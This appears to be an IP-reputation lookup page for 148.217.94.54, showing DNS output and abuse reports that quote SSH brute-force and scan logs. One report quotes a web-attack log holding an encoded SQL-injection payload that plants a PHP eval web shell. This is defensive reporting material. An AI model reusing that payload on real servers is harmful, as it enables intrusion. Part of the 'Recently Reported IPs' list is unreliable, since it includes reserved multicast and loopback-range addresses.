148.217.94.54 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: Mexico

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

IP	Type	Details	Datetime
148.217.94.19	attack	Brute force SSH attack	2019-12-24 07:41:03
148.217.94.19	attack	Dec 20 18:21:45 root sshd[6276]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=148.217.94.19 Dec 20 18:21:47 root sshd[6276]: Failed password for invalid user bardoff from 148.217.94.19 port 42588 ssh2 Dec 20 18:27:33 root sshd[6307]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=148.217.94.19 ...	2019-12-21 01:48:53
148.217.94.19	attack	Too many connections or unauthorized access detected from Arctic banned ip	2019-12-18 18:41:21

Type

Details

Datetime

148.217.94.19

attack

Brute force SSH attack

2019-12-24 07:41:03

148.217.94.19

attack

Dec 20 18:21:45 root sshd[6276]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=148.217.94.19 
Dec 20 18:21:47 root sshd[6276]: Failed password for invalid user bardoff from 148.217.94.19 port 42588 ssh2
Dec 20 18:27:33 root sshd[6307]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=148.217.94.19 
...

2019-12-21 01:48:53

148.217.94.19

attack

Too many connections or unauthorized access detected from Arctic banned ip

2019-12-18 18:41:21

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 148.217.94.54
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 56908
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;148.217.94.54.			IN	A

;; AUTHORITY SECTION:
.			29	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025021902 1800 900 604800 86400

;; Query time: 12 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Feb 20 10:19:35 CST 2025
;; MSG SIZE  rcvd: 106

Host info

54.94.217.148.in-addr.arpa domain name pointer rimd.reduaz.mx.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
54.94.217.148.in-addr.arpa	name = rimd.reduaz.mx.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
201.213.208.198	attack	Automatic report - Port Scan Attack	2019-11-18 05:23:38
59.90.185.127	attack	B: Magento admin pass test (wrong country)	2019-11-18 05:17:27
217.113.3.94	attack	11/17/2019-15:35:54.512653 217.113.3.94 Protocol: 6 ET SCAN Suspicious inbound to MSSQL port 1433	2019-11-18 05:26:06
154.8.185.122	attackbotsspam	$f2bV_matches	2019-11-18 05:18:26
183.89.236.232	attack	firewall-block, port(s): 23/tcp	2019-11-18 05:29:36
51.68.141.62	attack	Nov 17 15:36:09 MK-Soft-VM7 sshd[8086]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.68.141.62 Nov 17 15:36:10 MK-Soft-VM7 sshd[8086]: Failed password for invalid user belita from 51.68.141.62 port 48810 ssh2 ...	2019-11-18 05:22:31
59.10.5.156	attackspambots	2019-11-17T20:08:51.280037abusebot-5.cloudsearch.cf sshd\[9464\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=59.10.5.156 user=root	2019-11-18 05:31:32
188.165.219.27	attackbots	Nov 17 10:10:16 mailman postfix/smtpd[8088]: warning: ns312584.ip-188-165-219.eu[188.165.219.27]: SASL LOGIN authentication failed: authentication failure	2019-11-18 05:34:43
183.89.242.6	attackspam	Telnet/23 MH Probe, BF, Hack -	2019-11-18 05:25:43
64.246.178.34	attack	Automatic report - Banned IP Access	2019-11-18 05:27:56
83.171.107.216	attack	Nov 17 16:54:08 eventyay sshd[1810]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=83.171.107.216 Nov 17 16:54:10 eventyay sshd[1810]: Failed password for invalid user netadmin from 83.171.107.216 port 2705 ssh2 Nov 17 16:58:15 eventyay sshd[1867]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=83.171.107.216 ...	2019-11-18 05:05:30
103.70.204.194	attackbotsspam	2019-11-17 11:41:47 H=(locopress.it) [103.70.204.194]:33227 I=[192.147.25.65]:25 F= rejected RCPT : RBL: found in thrukfz5b56tq6xao6odgdyjrq.zen.dq.spamhaus.net (127.0.0.4, 127.0.0.3, 127.0.0.11) (https://www.spamhaus.org/sbl/query/SBLCSS) 2019-11-17 11:41:48 H=(locopress.it) [103.70.204.194]:33227 I=[192.147.25.65]:25 F= rejected RCPT : RBL: found in thrukfz5b56tq6xao6odgdyjrq.zen.dq.spamhaus.net (127.0.0.4, 127.0.0.3, 127.0.0.11) (https://www.spamhaus.org/sbl/query/SBLCSS) 2019-11-17 11:41:48 H=(locopress.it) [103.70.204.194]:33227 I=[192.147.25.65]:25 F= rejected RCPT : RBL: found in thrukfz5b56tq6xao6odgdyjrq.zen.dq.spamhaus.net (127.0.0.4, 127.0.0.3, 127.0.0.11) (https://www.spamhaus.org/sbl/query/SBLCSS) ...	2019-11-18 05:30:16
104.148.105.5	attack	Web app attack & sql injection attempts. Date: 2019 Nov 17. 18:11:58 Source IP: 104.148.105.5 Portion of the log(s): 104.148.105.5 - [17/Nov/2019:18:11:57 +0100] "POST /ysyqq.php HTTP/1.1" 404 548 "http://[removed].hu/ysyqq.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 104.148.105.5 - [17/Nov/2019:18:11:56 +0100] GET /user.php?act=login HTTP/1.1" 404 548 "45ea207d7a2b68c49582d2d22adf953aads\|a:2:{s:3:\x22num\x22;s:297:\x22/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A336C7A655846784C6E426F634363734A7A772F63476877494756325957776F4A46395154314E5557336C7A655630704F79412F506963702729293B2F2F7D787878,10-- -\x22;s:2:\x22id\x22;s:11:\x22-1' UNION/\x22;}45ea207d7a2b68c49582d2d22adf953a" 104.148.105.5 - [17/Nov/2019:18:11:56 +0100] POST /fqopr.php 104.148.105.5 - [17/Nov/2019:18:11:56 +0100] POST /fdgq.php 104.148.105.5 - [17/Nov/2019:18:11:56 +0100] GET /user.php?act=login ....	2019-11-18 05:01:17
139.155.33.169	attack	2019-11-17T09:25:00.7456401495-001 sshd\[45380\]: Failed password for invalid user prangley from 139.155.33.169 port 49204 ssh2 2019-11-17T10:28:33.2069521495-001 sshd\[47640\]: Invalid user lehne from 139.155.33.169 port 45926 2019-11-17T10:28:33.2134631495-001 sshd\[47640\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.155.33.169 2019-11-17T10:28:34.9290741495-001 sshd\[47640\]: Failed password for invalid user lehne from 139.155.33.169 port 45926 ssh2 2019-11-17T10:34:34.7123901495-001 sshd\[47846\]: Invalid user aldinger from 139.155.33.169 port 50774 2019-11-17T10:34:34.7202411495-001 sshd\[47846\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.155.33.169 ...	2019-11-18 05:33:54
121.172.162.34	attackbotsspam	Nov 17 17:38:45 www sshd\[14519\]: Invalid user becky from 121.172.162.34 Nov 17 17:38:45 www sshd\[14519\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=121.172.162.34 Nov 17 17:38:48 www sshd\[14519\]: Failed password for invalid user becky from 121.172.162.34 port 44774 ssh2 ...	2019-11-18 05:03:43

Recently Reported IPs

209.208.68.15	170.78.49.168	237.177.164.38	137.159.172.114
4.42.65.38	147.155.78.246	73.241.89.252	239.59.66.255
46.4.196.161	200.83.231.254	56.90.87.187	7.111.21.147
127.125.159.15	204.221.222.115	198.219.160.165	72.177.138.234
90.137.153.255	44.25.116.25	224.75.107.121	82.79.254.6